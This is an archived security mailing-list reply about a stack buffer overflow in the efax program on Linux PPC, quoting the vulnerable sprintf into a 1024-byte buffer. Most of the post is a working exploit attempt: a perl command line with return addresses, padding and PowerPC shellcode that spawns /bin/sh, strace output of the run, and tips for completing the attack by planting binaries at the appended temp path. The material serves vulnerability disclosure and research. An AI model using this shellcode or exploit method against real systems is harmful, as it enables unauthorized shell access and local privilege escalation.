Re: efax - Exploitation info

[KF <dotslash () snosoft com>]

I was playing with efax on ppc and it is REAL picky about how the 
shellcode is layed out... or it could be a problem with a char
in my shellcode also. Regardless the layout is 
<returns><nops><shellcode> I have found I must have a trailing 0x2f
if I try this method... otherwise the /sh gets lopped off. It then adds 
..0 and then the pid of the process. This is obvious if
you look at the code below provided by s1gnal_9. Here is some strace 
dumps and some Ugly perl from
me so have fun. ( perl is NOT my forte) and sorry that my MUI sucks and 
chops all my lines up...

[root@linuxppc root]# strace /usr/bin/efax -x `perl -e 'print 
"\x7f\xff\x25\xc0" x 274'``perl -e 'print "\x69\x69\x69\x69" x 14'``perl 
-e 
'print"\x7c\xa5\x2a\x78\x40\x82\xff\xed\x7f\xe8\x02\xa6\x3b\xff\x01\x30\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x2f" 
x 1'``perl -e 'print "\x69\x69\x69\x69" x 14'`

execve("/usr/bin/efax", ["/usr/bin/efax", "-x", "..( returns here) 
ÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii"], 
[/* 46 vars */]) = 0
...

write(2, "efax: 15:10 Error: can\'t open pr"..., 1279efax: 15:10 Error: 
can't open pre-lock file ( returns here )
%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/TMP..01350: 
File name too long
) = 1279
execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: 
Input/output error
, [/* 0 vars */]) = -1 ENOTDIR (Not a directory)
--- SIGILL (Illegal instruction) ---


If you look here you can see that some how my execve got TMP..01350 
appended to it and also a slash becasue
obviously I put it there ... if i didn't add the / my execve would say 
execve("/bin/TMP..01350", ["/bin/TMP..01350"] ...
instead I am left to work with the following...

execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: 
Input/output error
, [/* 0 vars */]) = -1 ENOTDIR (Not a directory)

it is workable though *grin*...adjust the shellcode a bit and add 
TMP..pid on to the end of it ... mkdir /tmp/sh/
and copy a few binarys to TMP..0xxxx

Have fun and if you don't maybe you can work out a better way. (I just 
thought of one but I am lazy ... it involves lopping
off sh and just using TMP..pid for the bin).

-KF

+++ killed by SIGILL +++s1gnal_9 wrote:

> More info about the overflow...
>
> Straight from efax src.
>
> <--snip--->
> #define EFAX_PATH_MAX 1024
> <--/snip--->
>
> <--snip--->
> char *p , buf [ EFAX_PATH_MAX ] = "" ;
> <--/snip--->
>
> <--snip--->
> sprintf ( buf , "%.*sTMP..%05d" , dirlen , fname , (int) pid ) ;
> <--/snip--->
> the sprinf above causes the overflow..